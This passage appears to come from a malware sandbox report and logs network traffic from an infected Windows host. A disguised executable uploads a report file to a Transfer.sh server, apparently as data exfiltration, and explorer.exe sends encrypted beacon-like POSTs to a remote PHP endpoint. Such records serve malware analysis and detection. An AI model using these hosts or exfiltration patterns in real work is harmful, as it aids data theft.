Nov 18, 2023 10:02:52.248569012 CET	33978	OUT	Data Raw: 87 51 1b dc ed 65 dd d6 bc e4 67 a1 f2 3b 33 ec 96 aa c1 d8 a3 f0 14 e6 05 3f 0a 31 84 aa 5a bc c2 42 55 3b 27 41 80 71 40 fb c3 1e 62 4d c2 5b 9f ec 2e 40 cd 6e 09 49 a3 75 43 24 eb 23 c6 a4 29 1b 9b b8 a7 1e c7 99 9e cf a7 cc bb 6f 19 4b 23 5d Data Ascii: Qeg;3?1ZBU;'Aq@bM[.@nIuC$#)oK#]w_EJ*Z}6?qNC{5,)_<k-"lOkF'DqffxThs7fiJIch6;F#,O7m
Nov 18, 2023 10:02:52.248636961 CET	34000	OUT	Data Raw: d7 b3 b1 d4 fa 67 ed 7c a7 85 84 bb aa 66 79 cc 6b 26 70 ad 13 d7 f9 fc 79 79 57 c6 b2 9f ef 21 0a 2a b0 b2 4b 87 7e 3f 39 dd 10 71 e8 1b 99 1a 6a 23 00 6b db 47 e5 8b 04 84 b4 9b 00 39 88 3e 86 6d b0 d0 78 86 d3 4b 04 14 20 0c 68 62 78 80 85 54 Data Ascii: g\|fyk&pyyW!K~?9qj#kG9>mxK hbxTOhFA'{RR1.&MTik.3/'Cg\JGiS E3]7Vk>#,;bj'P7`R1eDUe
Nov 18, 2023 10:02:52.550229073 CET	34757	OUT	Data Raw: d1 97 04 f6 f1 9e 46 67 43 3a 25 39 ac f3 44 bb 48 6c e4 97 29 ca 01 3b c6 b4 f4 7c 5d 96 e0 37 11 5d bd 7d 6f 2a 31 f3 0c 13 20 73 60 08 a1 5f aa a4 6f 3e 32 db c2 82 57 b3 02 5e b5 f9 da fb bd 54 2f b5 24 fe bf 48 08 c9 a7 86 2b 9e 33 01 3f 09 Data Ascii: FgC:%9DHl);\|]7]}o*1 s`_o>2W^T/$H+3?+AGMY.-=br5]+Rb9^1@dvdvu$Z:_?TGK(UsDX3BA{onGA/X.h9Izzg6\U
Nov 18, 2023 10:02:52.550384045 CET	34782	OUT	Data Raw: 5b 84 3c d8 d4 31 f3 a1 2f 84 d0 9d ce f6 95 49 5e f7 ef 25 53 37 86 99 9a 0e 37 1b 77 5c 2c 9d d0 ea bb 40 1a fb 7e fb a5 7e 02 11 d5 7c 32 1e 51 8f 6b 89 97 e7 18 dc 27 f2 c5 39 62 3d d0 72 16 29 3e 42 fb b1 10 8d e1 22 ab e3 2f 55 cc bb 5c f1 Data Ascii: [<1/I^%S77w\,@~~\|2Qk'9b=r)>B"/U\P^`6^xG8s%LXriAJ{: _b[dQ++VXe7v`z`(oc\dSI0G329urxP{qRk=\|=#NZ@e2mzr@
Nov 18, 2023 10:02:52.550462961 CET	34790	OUT	Data Raw: 47 d4 7f d4 a9 53 03 1e b5 69 b9 b4 c5 71 fd 23 f4 b6 58 f9 5d c1 3c cf 7c 3a 36 47 cb 6c 52 0b 5a 63 50 5b bc fc d9 8b 30 6d 11 78 ca c4 eb 41 df ac bc 1d ef 83 69 63 d7 a6 0a e8 0b b2 a5 1e e6 0c 8e 02 17 47 df 18 55 77 ec fe 4e 07 ae ad 6f 17 Data Ascii: GSiq#X]<\|:6GlRZcP[0mxAicGUwNo:vB3^t B7+,5Ek@cs<y3aT\)^R'}OxO3hru{&}cUs 0s(`@rT>%I\LIxr?.#
Nov 18, 2023 10:02:52.852127075 CET	36317	OUT	Data Raw: 6d a5 e8 ab 4e e8 f5 03 4d 94 08 da 91 8b e3 d1 cc b7 2e d4 7b 52 33 c9 5f 5e c6 c3 cc e9 ac 8c f4 7c c7 74 4a c5 d1 94 eb 92 94 12 83 d4 4f a2 ce 6d 62 f6 3a d9 cc e0 64 b1 3d e0 5d b7 ed 67 e4 7a 22 e3 eb 95 b3 9d 54 71 76 27 cd c0 f1 44 88 9b Data Ascii: mNM.{R3_^\|tJOmb:d=]gz"Tqv'D}ZfhJi:YG#;Y8^pu^YF40O.vyF2Xz(W_(qGS"xKWwmSs(bFnDc_)v=S
Nov 18, 2023 10:02:52.852236032 CET	36342	OUT	Data Raw: d3 aa 6c 0a de f5 40 04 db b3 8f 4d 7b 98 c8 4f 7f f8 b7 0b 81 41 31 5b 89 4c bc 0b fe 09 62 44 d7 80 73 c4 94 cd 53 26 ba f8 07 6b 4d ba b1 fe 5e 8a 8a e4 f6 f2 6d 7f ae 9d c2 ca 45 9e a4 82 ae 83 65 8c bd f1 90 50 a4 cb 57 08 5b f2 c5 e6 97 19 Data Ascii: l@M{OA1[LbDsS&kM^mEePW[Zg0hOooii+Ok1N-=Ha!>x\%<Z2"\VyY6>z/z>Zl\|~9;,"@Cw9[0haT]
Nov 18, 2023 10:02:52.852514029 CET	36375	OUT	Data Raw: 97 1f 9e 3a 34 5d 4a 1a af 4c fc e0 12 e4 14 fa 4d e5 f7 6d 80 17 ed 0c fc 85 aa 65 e5 77 24 4d ce 22 75 ac f8 f3 03 c8 be 72 67 95 22 e9 9b f5 ee 6c 7a 55 3c e0 63 40 1a 12 4f db 57 2d b2 10 90 a4 4a 38 7a 6a 77 16 29 27 2e 5a 4f f5 55 b4 83 1f Data Ascii: :4]JLMmew$M"urg"lzU<c@OW-J8zjw)'.ZOUP 2\\X_.H[R78SR<_jO)>b2o4W$yXHiKfk8,O/i<Gdk8V@6RG<dow7W^$\O
Nov 18, 2023 10:02:53.154366016 CET	39106	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sat, 18 Nov 2023 09:02:53 GMT Content-Length: 26 Connection: close Data Raw: 52 65 73 74 72 69 63 74 65 64 20 66 69 6c 65 20 65 78 74 65 6e 73 69 6f 6e 0a Data Ascii: Restricted file extension

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	217.145.238.175	80	192.168.2.4	49773	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:53.509486914 CET	42382	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 217.145.238.175 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:02:53.808895111 CET	45373	IN	HTTP/1.1 100 Continue
Nov 18, 2023 10:02:53.816437960 CET	45385	OUT	Data Raw: 57 53 52 24 dd e8 dd b7 d6 dc a5 83 a6 b7 ac 77 2b eb 6f 24 b2 18 c8 e5 70 79 12 c2 38 af f7 a7 e5 13 05 cc 8b db 9a 00 77 d6 e2 4d c1 11 2d 1d 36 cb 7c 28 c8 4a db bd 49 b9 19 a4 d9 0c 44 2c 5f 01 da ca 6e 00 6c 4c 8b ea c9 26 ad 94 26 61 12 9a Data Ascii: WSR$w+o$py8wM-6\|(JID,_nlL&&a}t_VI5d.WVWj-F/8f{Qa\/g4 Ci]`[q7HP(bn@Ad5hUIR7@D%&\|{F4"6v 'B)z{+a#-
Nov 18, 2023 10:02:54.101226091 CET	46348	OUT	Data Raw: 87 51 1b dc ed 65 dd d6 bc e4 67 a1 f2 3b 33 ec 96 aa c1 d8 a3 f0 14 e6 05 3f 0a 31 84 aa 5a bc c2 42 55 3b 27 41 80 71 40 fb c3 1e 62 4d c2 5b 9f ec 2e 40 cd 6e 09 49 a3 75 43 24 eb 23 c6 a4 29 1b 9b b8 a7 1e c7 99 9e cf a7 cc bb 6f 19 4b 23 5d Data Ascii: Qeg;3?1ZBU;'Aq@bM[.@nIuC$#)oK#]w_EJ*Z}6?qNC{5,)_<k-"lOkF'DqffxThs7fiJIch6;F#,O7m
Nov 18, 2023 10:02:54.391272068 CET	46377	OUT	Data Raw: d1 97 04 f6 f1 9e 46 67 43 3a 25 39 ac f3 44 bb 48 6c e4 97 29 ca 01 3b c6 b4 f4 7c 5d 96 e0 37 11 5d bd 7d 6f 2a 31 f3 0c 13 20 73 60 08 a1 5f aa a4 6f 3e 32 db c2 82 57 b3 02 5e b5 f9 da fb bd 54 2f b5 24 fe bf 48 08 c9 a7 86 2b 9e 33 01 3f 09 Data Ascii: FgC:%9DHl);\|]7]}o*1 s`_o>2W^T/$H+3?+AGMY.-=br5]+Rb9^1@dvdvu$Z:_?TGK(UsDX3BA{onGA/X.h9Izzg6\U
Nov 18, 2023 10:02:54.391463995 CET	46382	OUT	Data Raw: 67 9e e0 d2 b2 30 d9 e7 84 5b 64 32 ff 1c 1f ff 7c 3b e2 69 81 b6 e7 f6 2e 26 90 15 64 73 2f 81 05 2c 7c e5 ed d8 a1 ba 8c c1 4d b0 85 37 0b 22 fb 0e 70 89 b8 7d 2b 9c 6b e3 0c eb 0f 60 2e 2a 63 4d e9 1b 23 b7 1e 4a 1b fb a5 61 12 60 4e 3f 3c 6b Data Ascii: g0[d2\|;i.&ds/,\|M7"p}+k`.cM#Ja`N?<kGk/UQU[KxIG0sIanF_X6xrPP7R9OywVb(>Q.E@nB%j?h`~!'>
Nov 18, 2023 10:02:54.391613960 CET	46393	OUT	Data Raw: 9f 2d 90 dc 84 5f d1 22 27 4d d7 50 e0 28 ec 2b c2 8d 1f 81 75 89 de 70 96 34 09 f6 ec ba f5 c3 27 56 c0 3b 11 64 57 2b ba f0 ad ba f2 eb d8 33 93 da 41 c7 3a cd ac 37 9c e6 02 72 9d 76 00 74 83 bc 42 78 da be f5 8f 34 1b da e4 f5 dd b3 44 62 99 Data Ascii: -_"'MP(+up4'V;dW+3A:7rvtBx4Db~NL&Q4<N4UWG~k\YcJAt962p%[9n$0Y"}U @KBU~e<y<*H2<=~2J/2r,Die6?
Nov 18, 2023 10:02:54.393414974 CET	46398	OUT	Data Raw: 47 d4 7f d4 a9 53 03 1e b5 69 b9 b4 c5 71 fd 23 f4 b6 58 f9 5d c1 3c cf 7c 3a 36 47 cb 6c 52 0b 5a 63 50 5b bc fc d9 8b 30 6d 11 78 ca c4 eb 41 df ac bc 1d ef 83 69 63 d7 a6 0a e8 0b b2 a5 1e e6 0c 8e 02 17 47 df 18 55 77 ec fe 4e 07 ae ad 6f 17 Data Ascii: GSiq#X]<\|:6GlRZcP[0mxAicGUwNo:vB3^t B7+,5Ek@cs<y3aT\)^R'}OxO3hru{&}cUs 0s(`@rT>%I\LIxr?.#
Nov 18, 2023 10:02:54.435472965 CET	46400	OUT	Data Raw: 16 c8 ae 9b d2 65 c6 9a 8d 13 f0 0e bc 6f a7 4d 00 80 eb 24 c7 72 18 5a 1b 0b f9 91 bf 0a 1d 1f fb 6b d8 18 98 aa 53 a1 77 74 53 c1 a5 0a 0a de ef d4 25 0b 8a ec 12 ef aa ef 09 a7 e6 95 d5 cd 72 59 b9 e2 de 2e 16 5d 89 d8 08 70 0a 1a c3 72 2f e3 Data Ascii: eoM$rZkSwtS%rY.]pr/KF(GFpY;^{>o?#o"8Qy^}CON4W=d;e`\q:H:@!"nUKY2hUgnPw7@m:&r~&TLpw#rXeurpE
Nov 18, 2023 10:02:54.679023027 CET	46434	OUT	Data Raw: 6d a5 e8 ab 4e e8 f5 03 4d 94 08 da 91 8b e3 d1 cc b7 2e d4 7b 52 33 c9 5f 5e c6 c3 cc e9 ac 8c f4 7c c7 74 4a c5 d1 94 eb 92 94 12 83 d4 4f a2 ce 6d 62 f6 3a d9 cc e0 64 b1 3d e0 5d b7 ed 67 e4 7a 22 e3 eb 95 b3 9d 54 71 76 27 cd c0 f1 44 88 9b Data Ascii: mNM.{R3_^\|tJOmb:d=]gz"Tqv'D}ZfhJi:YG#;Y8^pu^YF40O.vyF2Xz(W_(qGS"xKWwmSs(bFnDc_)v=S
Nov 18, 2023 10:02:54.679058075 CET	46441	OUT	Data Raw: 0f 7b c3 32 95 59 f9 e8 b0 16 ff e0 8f 84 d2 8c 2d cc f4 86 45 c0 99 b4 56 a1 ae 12 8c ab 97 b2 73 d9 f9 0c 73 ea 01 fc f3 68 ff ea d1 22 8c e3 24 24 e1 b3 41 ff 34 77 e1 93 d2 c6 44 0d f9 2f 8b 5d ce f3 6f 9a 6a de f8 97 ec 14 3b 6a 49 0c fe d1 Data Ascii: {2Y-EVssh"$$A4wD/]oj;jICQ<Xo1^}8'X+!7ZzV`i`]kZR>I6<LmPt=$tgdm*E{jN7 \LE wxyc`^Az8_e.#&T
Nov 18, 2023 10:02:54.679253101 CET	46458	OUT	Data Raw: 18 5d 62 a2 a5 b4 05 f0 71 16 89 27 29 39 a9 54 d9 f7 df 1d b8 25 24 8b 58 6e e8 34 d2 c8 af 37 00 09 d4 1f 46 3c 49 66 f4 58 80 ef 4d e5 fa 11 a5 d4 6e 20 41 39 31 c5 39 e0 b4 4a 5d a6 14 a3 e8 f4 e0 23 61 75 c8 86 c3 c8 98 16 35 c1 bb 17 24 78 Data Ascii: ]bq')9T%$Xn47F<IfXMn A919J]#au5$x.b&s;!V\eW\|J=k@x4"cy3H!FP&ruUI{JWNr{htRC9 6Ju79[=b5Z%>s
Nov 18, 2023 10:02:54.977051973 CET	46460	IN	HTTP/1.1 200 OK Content-Type: text/plain Server: Transfer.sh HTTP Server 1.0 X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders X-Url-Delete: http://217.145.238.175/kSY3x/42asb_user@813848_report.wsr/10LGMPlvaq6 Date: Sat, 18 Nov 2023 09:02:54 GMT Content-Length: 58 Data Raw: 68 74 74 70 3a 2f 2f 32 31 37 2e 31 34 35 2e 32 33 38 2e 31 37 35 2f 6b 53 59 33 78 2f 34 32 61 73 62 5f 6a 6f 6e 65 73 40 38 31 33 38 34 38 5f 72 65 70 6f 72 74 2e 77 73 72 Data Ascii: http://217.145.238.175/kSY3x/42asb_user@813848_report.wsr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.2.4	49773	217.145.238.175	80	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:53.509486914 CET	42382	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 217.145.238.175 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:02:53.808895111 CET	45373	IN	HTTP/1.1 100 Continue
Nov 18, 2023 10:02:53.816437960 CET	45385	OUT	Data Raw: 57 53 52 24 dd e8 dd b7 d6 dc a5 83 a6 b7 ac 77 2b eb 6f 24 b2 18 c8 e5 70 79 12 c2 38 af f7 a7 e5 13 05 cc 8b db 9a 00 77 d6 e2 4d c1 11 2d 1d 36 cb 7c 28 c8 4a db bd 49 b9 19 a4 d9 0c 44 2c 5f 01 da ca 6e 00 6c 4c 8b ea c9 26 ad 94 26 61 12 9a Data Ascii: WSR$w+o$py8wM-6\|(JID,_nlL&&a}t_VI5d.WVWj-F/8f{Qa\/g4 Ci]`[q7HP(bn@Ad5hUIR7@D%&\|{F4"6v 'B)z{+a#-
Nov 18, 2023 10:02:54.101226091 CET	46348	OUT	Data Raw: 87 51 1b dc ed 65 dd d6 bc e4 67 a1 f2 3b 33 ec 96 aa c1 d8 a3 f0 14 e6 05 3f 0a 31 84 aa 5a bc c2 42 55 3b 27 41 80 71 40 fb c3 1e 62 4d c2 5b 9f ec 2e 40 cd 6e 09 49 a3 75 43 24 eb 23 c6 a4 29 1b 9b b8 a7 1e c7 99 9e cf a7 cc bb 6f 19 4b 23 5d Data Ascii: Qeg;3?1ZBU;'Aq@bM[.@nIuC$#)oK#]w_EJ*Z}6?qNC{5,)_<k-"lOkF'DqffxThs7fiJIch6;F#,O7m
Nov 18, 2023 10:02:54.391272068 CET	46377	OUT	Data Raw: d1 97 04 f6 f1 9e 46 67 43 3a 25 39 ac f3 44 bb 48 6c e4 97 29 ca 01 3b c6 b4 f4 7c 5d 96 e0 37 11 5d bd 7d 6f 2a 31 f3 0c 13 20 73 60 08 a1 5f aa a4 6f 3e 32 db c2 82 57 b3 02 5e b5 f9 da fb bd 54 2f b5 24 fe bf 48 08 c9 a7 86 2b 9e 33 01 3f 09 Data Ascii: FgC:%9DHl);\|]7]}o*1 s`_o>2W^T/$H+3?+AGMY.-=br5]+Rb9^1@dvdvu$Z:_?TGK(UsDX3BA{onGA/X.h9Izzg6\U
Nov 18, 2023 10:02:54.391463995 CET	46382	OUT	Data Raw: 67 9e e0 d2 b2 30 d9 e7 84 5b 64 32 ff 1c 1f ff 7c 3b e2 69 81 b6 e7 f6 2e 26 90 15 64 73 2f 81 05 2c 7c e5 ed d8 a1 ba 8c c1 4d b0 85 37 0b 22 fb 0e 70 89 b8 7d 2b 9c 6b e3 0c eb 0f 60 2e 2a 63 4d e9 1b 23 b7 1e 4a 1b fb a5 61 12 60 4e 3f 3c 6b Data Ascii: g0[d2\|;i.&ds/,\|M7"p}+k`.cM#Ja`N?<kGk/UQU[KxIG0sIanF_X6xrPP7R9OywVb(>Q.E@nB%j?h`~!'>
Nov 18, 2023 10:02:54.391613960 CET	46393	OUT	Data Raw: 9f 2d 90 dc 84 5f d1 22 27 4d d7 50 e0 28 ec 2b c2 8d 1f 81 75 89 de 70 96 34 09 f6 ec ba f5 c3 27 56 c0 3b 11 64 57 2b ba f0 ad ba f2 eb d8 33 93 da 41 c7 3a cd ac 37 9c e6 02 72 9d 76 00 74 83 bc 42 78 da be f5 8f 34 1b da e4 f5 dd b3 44 62 99 Data Ascii: -_"'MP(+up4'V;dW+3A:7rvtBx4Db~NL&Q4<N4UWG~k\YcJAt962p%[9n$0Y"}U @KBU~e<y<*H2<=~2J/2r,Die6?
Nov 18, 2023 10:02:54.393414974 CET	46398	OUT	Data Raw: 47 d4 7f d4 a9 53 03 1e b5 69 b9 b4 c5 71 fd 23 f4 b6 58 f9 5d c1 3c cf 7c 3a 36 47 cb 6c 52 0b 5a 63 50 5b bc fc d9 8b 30 6d 11 78 ca c4 eb 41 df ac bc 1d ef 83 69 63 d7 a6 0a e8 0b b2 a5 1e e6 0c 8e 02 17 47 df 18 55 77 ec fe 4e 07 ae ad 6f 17 Data Ascii: GSiq#X]<\|:6GlRZcP[0mxAicGUwNo:vB3^t B7+,5Ek@cs<y3aT\)^R'}OxO3hru{&}cUs 0s(`@rT>%I\LIxr?.#
Nov 18, 2023 10:02:54.435472965 CET	46400	OUT	Data Raw: 16 c8 ae 9b d2 65 c6 9a 8d 13 f0 0e bc 6f a7 4d 00 80 eb 24 c7 72 18 5a 1b 0b f9 91 bf 0a 1d 1f fb 6b d8 18 98 aa 53 a1 77 74 53 c1 a5 0a 0a de ef d4 25 0b 8a ec 12 ef aa ef 09 a7 e6 95 d5 cd 72 59 b9 e2 de 2e 16 5d 89 d8 08 70 0a 1a c3 72 2f e3 Data Ascii: eoM$rZkSwtS%rY.]pr/KF(GFpY;^{>o?#o"8Qy^}CON4W=d;e`\q:H:@!"nUKY2hUgnPw7@m:&r~&TLpw#rXeurpE
Nov 18, 2023 10:02:54.679023027 CET	46434	OUT	Data Raw: 6d a5 e8 ab 4e e8 f5 03 4d 94 08 da 91 8b e3 d1 cc b7 2e d4 7b 52 33 c9 5f 5e c6 c3 cc e9 ac 8c f4 7c c7 74 4a c5 d1 94 eb 92 94 12 83 d4 4f a2 ce 6d 62 f6 3a d9 cc e0 64 b1 3d e0 5d b7 ed 67 e4 7a 22 e3 eb 95 b3 9d 54 71 76 27 cd c0 f1 44 88 9b Data Ascii: mNM.{R3_^\|tJOmb:d=]gz"Tqv'D}ZfhJi:YG#;Y8^pu^YF40O.vyF2Xz(W_(qGS"xKWwmSs(bFnDc_)v=S
Nov 18, 2023 10:02:54.679058075 CET	46441	OUT	Data Raw: 0f 7b c3 32 95 59 f9 e8 b0 16 ff e0 8f 84 d2 8c 2d cc f4 86 45 c0 99 b4 56 a1 ae 12 8c ab 97 b2 73 d9 f9 0c 73 ea 01 fc f3 68 ff ea d1 22 8c e3 24 24 e1 b3 41 ff 34 77 e1 93 d2 c6 44 0d f9 2f 8b 5d ce f3 6f 9a 6a de f8 97 ec 14 3b 6a 49 0c fe d1 Data Ascii: {2Y-EVssh"$$A4wD/]oj;jICQ<Xo1^}8'X+!7ZzV`i`]kZR>I6<LmPt=$tgdm*E{jN7 \LE wxyc`^Az8_e.#&T
Nov 18, 2023 10:02:54.679253101 CET	46458	OUT	Data Raw: 18 5d 62 a2 a5 b4 05 f0 71 16 89 27 29 39 a9 54 d9 f7 df 1d b8 25 24 8b 58 6e e8 34 d2 c8 af 37 00 09 d4 1f 46 3c 49 66 f4 58 80 ef 4d e5 fa 11 a5 d4 6e 20 41 39 31 c5 39 e0 b4 4a 5d a6 14 a3 e8 f4 e0 23 61 75 c8 86 c3 c8 98 16 35 c1 bb 17 24 78 Data Ascii: ]bq')9T%$Xn47F<IfXMn A919J]#au5$x.b&s;!V\eW\|J=k@x4"cy3H!FP&ruUI{JWNr{htRC9 6Ju79[=b5Z%>s
Nov 18, 2023 10:02:54.977051973 CET	46460	IN	HTTP/1.1 200 OK Content-Type: text/plain Server: Transfer.sh HTTP Server 1.0 X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders X-Url-Delete: http://217.145.238.175/kSY3x/42asb_user@813848_report.wsr/10LGMPlvaq6 Date: Sat, 18 Nov 2023 09:02:54 GMT Content-Length: 58 Data Raw: 68 74 74 70 3a 2f 2f 32 31 37 2e 31 34 35 2e 32 33 38 2e 31 37 35 2f 6b 53 59 33 78 2f 34 32 61 73 62 5f 6a 6f 6e 65 73 40 38 31 33 38 34 38 5f 72 65 70 6f 72 74 2e 77 73 72 Data Ascii: http://217.145.238.175/kSY3x/42asb_user@813848_report.wsr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.2.4	49796	194.49.94.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:03:05.203046083 CET	46689	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uxojddkuvbahuqko.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 139 Host: 194.49.94.210
Nov 18, 2023 10:03:05.203073025 CET	46689	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a4 d5 f3 c9 39 df 28 fc c4 61 a0 58 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(aXELZBzb#)6xBQ6IOC#.?Q#;l,K#<k
Nov 18, 2023 10:03:05.515294075 CET	46692	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Nov 18, 2023 10:03:05.541991949 CET	46693	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gahbanwghcabjhyj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 336 Host: 194.49.94.210
Nov 18, 2023 10:03:05.542047024 CET	46693	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a5 d5 f3 c9 38 df 28 fc c9 39 b7 65 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP(8(9eVd8d{wjALp]dP3*?]Qc@O>O%"J6noK<[5KD.IFT"d+rrn'IIrm}pgvg^rrt%I9Z
Nov 18, 2023 10:03:05.850713015 CET	46694	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 37 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 46 a3 8d 6c d6 b2 26 5d Data Ascii: H>99$JY@kjFl&]
Nov 18, 2023 10:03:07.740592957 CET	46998	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kdkneuviugi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: 194.49.94.210
Nov 18, 2023 10:03:07.740643978 CET	46999	OUT	Data Raw: 14 6d 66 0e 32 17 16 83 fd 7c d7 51 76 a6 6b 5c 42 f4 f6 53 bb 1c 1e 35 90 9d 37 da f5 da b3 90 ee dc 47 bb bf 85 69 d3 0a 05 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a5 d5 f3 c9 39 df 28 fc cc 4a 9f 70 Data Ascii: mf2\|Qvk\BS57Gi}~Wj3L?bhP)9(JpYbQ3X(IclHAj~pd4{T6\9RQ\}3Hc#Z&Po<xR+Tv{gY
Nov 18, 2023 10:03:08.051196098 CET	47000	IN	HTTP/1.1 404 Not Found Date: Sat, 18 Nov 2023 09:03:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 414 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 